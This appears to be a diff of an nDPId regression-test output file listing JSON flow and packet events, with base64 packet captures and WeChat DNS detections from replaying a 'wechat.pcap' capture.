+02086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1562,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1492171171688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1254,"pkt_l4_len":1220,"thread_ts_msec":1492171171688,"pkt":"8IQvSpdgeJKcD6iOCABFAATYpo1AAEAGahPAqAFny82XotOnAbtQhl2xjWp\/PoAYBaR4aAAAAQEICgA\/SyBF4BL0FwMDBJ8AAAAAAAAAk06IK7tTPaQ0tnXGeqHKil75lMj6OyIERVlvQ89pkJ\/5uFrYubJHeJqSrynvitkot5qunWtMUvVbyI8vjd8zycM9IsUAAB\/fKHCxwAngzbmC6gdk\/UoKTL4MIPiK4NVVPRz1DsYhuoql6sqmFMKJKaM6NXpyBkCtYpvlazDCWxllWCP\/i12XdKQQMbcGYN2wvAB3a6vg6oJPIx+XXkk4cY\/+EENsi+PDerl+pB2IlJMObTfaJBhM\/rJFUKMd1xriphMBzgM9PCE+gKKP\/k+AYg8NddY\/gnJX\/+unfAflhC1NZ1nFt2\/\/Y9gesYC0uhG0uLLlbtLmKF2MPjllgxHAEeq6L2rXw2szIJL4yllp+t9tcKCYfzVRzCQkgUtQQaP0YiRh1NQtDTvnuPpM8CS6YfFOx17PkSNzepokWNsrLXMtr9p2nc9zczirZ\/D9H9Xey3Xx0qFAN\/MVzWUXfWpSlTWrXzNWP5kDdvTYBf19VGMPfxtzLKYTLOd\/rVswJ6OAUsAdfTYAu7j6c4KJubGecouom8T9brd1TJm6pyXignKkiQR+nvp0U\/G\/NxhEcnKV91SvFM0mQxh+hfK10svoh9dj1Bq8+PvXaAQljscptiwRlr+X\/V1zPyapTZcrW9A2fGrnzKqVYJASiCPQWyYD8Mn6pda0e6knRW3Ae28WpLnmyjMKx4\/7dOqugSoKa3q7BQRxbcpbcOXlPFfrjt+CwbA3KCTzFvdocE4QeSDn8FuJ85HFummmQOxK7tDtjljV+L\/2nbiMgjTy6jJzYFwXGw6xLdoXOupF5XjIfHUSMeB+R0BhUmtVxXEWPPHfAVdVJcBt8uO5QMhp9jxrSrOX54VXB+P7Qj0VmSag75Jhz20k8Z3uI27cFcp7OjdlKhlEBtlzESNSQ8FGkqCxygPJSf0REdvr2uQA0ApTgzzF+s6YbdeH3vy1SJOH2fQsH4IeYeRjAPrh1RmlhN066XBLLeGtIiz1LEJx17TCB8c1JpUan\/1+JYo
V0SCzXlaZWYybCxcBBIz\/2EdpG8hJzN4rtTVwf\/3OYFkhRTMbe1PHW9T5IfuTuKU76wWlDp+aujzjWp1vvFdq4bUrI6AdEquAU5C3BTnuLB9tqzlOb5nzcQjb4fPQCkUUcvHBPPLW9qrLyB05aTRG1W9ShnsibG\/AerW39YgPMVulkynnwtbGsYcGZs7KelCQXCLt3D6RU08N5SulLgw+o5aYItue0wJaW5VDEXxAVhsE4KU4+QsEuXkbd9rTsMt9Gf+Td49H8NzJEXxlYX\/ThtsZsn5doQpcdUcGVMiJrwpHQzTDWZLiBcd51axsLca9fP61xaeKb48j0Kb0TeXy0DcAfEDH4Sy29YAuNi7N4uKdxMrzHsqaQhCFI\/jmx6CqCWjy1zA6Ijzjpx6KTEeNxn3m7OTzuxckZQeS0ArKR7BX7UnCFIAenlvKt7e\/DzO9W1DndidXP+Qwf3XzvB+qvenTl6HWA0XtGBky3MCwBE5b++HXnyFlygjOvbY7LPZovuQtASvUqwAHPkuONuar\/2ZEP2TwCB+AOJYrpZq+HLOc"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1563,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171175912,"flow_last_seen":1492171175912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171175912,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1563,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1492171175912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171175912,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0iE1AAEAGSqnAqAFn2DrNg+MfAbtA+v0fFZsbqIAQAT54MgAAAQEICgA\/T0Ay2r7t"} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1564,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39195,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1564,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA01BdAAEAGIxbAqAFnX2UiIpkbAFBTLvPZ9eqaX4ARCgvX7AAAAQEICgA\/UBZwfB+e"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1565,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/69AAEAG937AqAFnX2UiIYi0AFB\/4ffl18M9+4ARCyPlEAAAAQEICgA\/UBZr6XAp"} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0jqVAAEAGaInAqAFnX2UiIYi3AFBZ1tli3d8I5IARBaRdlQAAAQEICgA\/UBdr6XCp"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1567,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0R7tAAEAGr3PAqAFnX2UiIYi4AFDlnJriImFMS4ARCdyDLQAAAQEICgA\/UBdr6XGp"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1568,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0HRZAAEAG2hfAqAFnX2UiIpknAFAjQjGaFOMj7IARBf682AAAAQEICgA\/UBdwfIhZ"} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1569,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.180.179","src_port":52020,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1569,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0251AAEAGiP7AqAFnX2W0s8s0AFCaGNVHW3dgu4ARJJf1WAAAAQEICgA\/UBcc0iJk"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1570,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1570,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0e59AAEAGnZzAqAFny82Tq+NyAbsh7o58Fu1nsYARAOW08AAAAQEICgA\/UBdF3\/Tx"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1571,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JkRAAEAG0OrAqAFnX2UiIYilAFA23DHogeAL9oARBaR6iAAAAQEICgA\/UBdr6Xcq"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1572,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA00nlAAEAGJLTAqAFnX2UiIpk\/AFBMVGJQaE9vZoARBU64QQAAAQEICgA\/UBdwfJTZ"} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1573,"source":"wechat.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":58165,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1573,"source":"wechat.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1492171176772,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAABE+U9AAEARvKPAqAFnwKgB\/uM1ADUAMHLoUUIBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} 00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1573,"source":"wechat.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":58165,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1574,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1492171177004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177004,"pkt":"8IQvSpdgeJKcD6iOCABFAAA01BhAAEAGIxXAqAFnX2UiIpkbAFBTLvPZ9eqaX4ARCgvXsQAAAQEICgA\/UFFwfB+e"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1575,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":1492171177012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177012,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0HRdAAEAG2hbAqAFnX2UiIpknAFAjQjGaFOMj7IARBf68nAAAAQEICgA\/UFNwfIhZ"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1576,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1492171177024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177024,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/7BAAEAG933AqAFnX2UiIYi0AFB\/4ffl18M9+4ARCyPk0AAAAQEICgA\/UFZr6XAp"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1577,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1492171177024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177024,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0R7xAAEAGr3LAqAFnX2UiIYi4AFDlnJriImFMS4ARCdyC7gAAAQEICgA\/UFZr6XGp"} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1578,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1492171177028,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177028,"pkt":"8IQvSpdgeJKcD6iOCABFAAA00npAAEAGJLPAqAFnX2UiIpk\/AFBMVGJQaE9vZoARBU64AQAAAQEICgA\/UFdwfJTZ"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1579,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1492171177032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177032,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JkVAAEAG0OnAqAFnX2UiIYilAFA23DHogeAL9oARBaR6RwAAAQEICgA\/UFhr6Xcq"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1580,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1492171177040,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177040,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0jqZAAEAGaIjAqAFnX2UiIYi3AFBZ1tli3d8I5IARBaRdUgAAAQEICgA\/UFpr6XCp"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1581,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1492171177040,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177040,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0255AAEAGiP3AqAFnX2W0s8s0AFCaGNVHW3dgu4ARJJf1FQAAAQEICgA\/UFoc0iJk"} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1582,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1492171177240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177240,"pkt":"8IQvSpdgeJKcD6iOCABFAAA01BlAAEAGIxTAqAFnX2UiIpkbAFBTLvPZ9eqaX4ARCgvXdgAAAQEICgA\/UIxwfB+e"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1589,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":3,"flow_last_seen":1492171177308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177308,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0259AAEAGiPzAqAFnX2W0s8s0AFCaGNVHW3dgu4ARJJf00gAAAQEICgA\/UJ0c0iJk"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1590,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1492171177380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177380,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0e6BAAEAGnZvAqAFny82Tq+NyAbsh7o58Fu1nsYARAOW0WAAAAQEICgA\/UK9F3\/Tx"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1574,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1492171177004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177004,"pkt":"8IQvSpdgeJKcD6iOCABFAAA01BhAAEAGIxXAqAFnX2UiIpkbAFBTLvPZ9eqaX4ARCgvXsQAAAQEICgA\/UFFwfB+e"} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1575,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":1492171177012,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177012,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0HRdAAEAG2hbAqAFnX2UiIpknAFAjQjGaFOMj7IARBf68nAAAAQEICgA\/UFNwfIhZ"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1576,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1492171177024,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177024,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/7BAAEAG933AqAFnX2UiIYi0AFB\/4ffl18M9+4ARCyPk0AAAAQEICgA\/UFZr6XAp"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1577,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1492171177024,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177024,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0R7xAAEAGr3LAqAFnX2UiIYi4AFDlnJriImFMS4ARCdyC7gAAAQEICgA\/UFZr6XGp"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1578,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1492171177028,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177028,"pkt":"8IQvSpdgeJKcD6iOCABFAAA00npAAEAGJLPAqAFnX2UiIpk\/AFBMVGJQaE9vZoARBU64AQAAAQEICgA\/UFdwfJTZ"} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1579,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1492171177032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177032,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JkVAAEAG0OnAqAFnX2UiIYilAFA23DHogeAL9oARBaR6RwAAAQEICgA\/UFhr6Xcq"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1580,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1492171177040,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177040,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0jqZAAEAGaIjAqAFnX2UiIYi3AFBZ1tli3d8I5IARBaRdUgAAAQEICgA\/UFpr6XCp"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1581,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1492171177040,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177040,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0255AAEAGiP3AqAFnX2W0s8s0AFCaGNVHW3dgu4ARJJf1FQAAAQEICgA\/UFoc0iJk"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1582,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1492171177240,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177240,"pkt":"8IQvSpdgeJKcD6iOCABFAAA01BlAAEAGIxTAqAFnX2UiIpkbAFBTLvPZ9eqaX4ARCgvXdgAAAQEICgA\/UIxwfB+e"} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1589,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":3,"flow_last_seen":1492171177308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177308,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0259AAEAGiPzAqAFnX2W0s8s0AFCaGNVHW3dgu4ARJJf00gAAAQEICgA\/UJ0c0iJk"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1590,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1492171177380,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177380,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0e6BAAEAGnZvAqAFny82Tq+NyAbsh7o58Fu1nsYARAOW0WAAAAQEICgA\/UK9F3\/Tx"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1591,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171177429,"flow_last_seen":1492171177429,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171177429,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1591,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1492171177429,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171177429,"pkt":"8IQvSpdgeJKcD6iOCABFAABE+fFAAEARvAHAqAFnwKgB\/qk1ADUAMHHYjFIBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} 00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1591,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171177429,"flow_last_seen":1492171177429,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171177429,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43317,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 